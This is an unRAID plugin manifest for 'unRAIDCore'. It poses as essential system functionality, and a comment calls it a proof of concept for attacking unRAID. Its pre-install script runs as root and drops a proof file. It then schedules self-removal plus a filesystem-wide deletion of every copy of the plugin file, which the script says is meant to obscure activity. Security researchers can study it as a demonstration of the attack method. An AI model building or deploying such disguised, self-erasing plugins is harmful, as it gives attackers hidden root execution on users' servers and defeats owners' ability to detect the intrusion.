<?xml version='1.0' standalone='yes'?>

<!DOCTYPE PLUGIN [
<!ENTITY name      "unRAIDCore">
<!ENTITY author    "squib">
<!ENTITY version   "2024.10.10">
<!ENTITY pluginURL "https://raw.githubusercontent.com/justin-himself/test/refs/heads/main/unRAIDCore.plg">
]>

<PLUGIN name="&name;"
        author="&author;"
        version="&version;"
        pluginURL="&pluginURL;">

<CHANGES>
##&name;
####2024-10-10
- first release
</CHANGES>

<!--
- This plugin provides essential functionality for unRAID and should not be removed.
- POC for attacking unRAID :]
-->

<!-- The 'pre-install' script. -->
<FILE Run="/bin/bash">
<INLINE>
# Run arbitrary commands as root
touch "/proof-$(date -Ins)"

# Schedule deletion of the plugin since immediate deletion fails silently
# Also remove the plugin from the list of removed plugins, tmp directory, pending directory, and elsewhere to obscure activity
echo "plugin remove unRAIDCore.plg; sleep 5s; find / -type f -name '*unRAIDCore.plg*' -delete" | at now +1 minutes

</INLINE>
</FILE>

</PLUGIN>
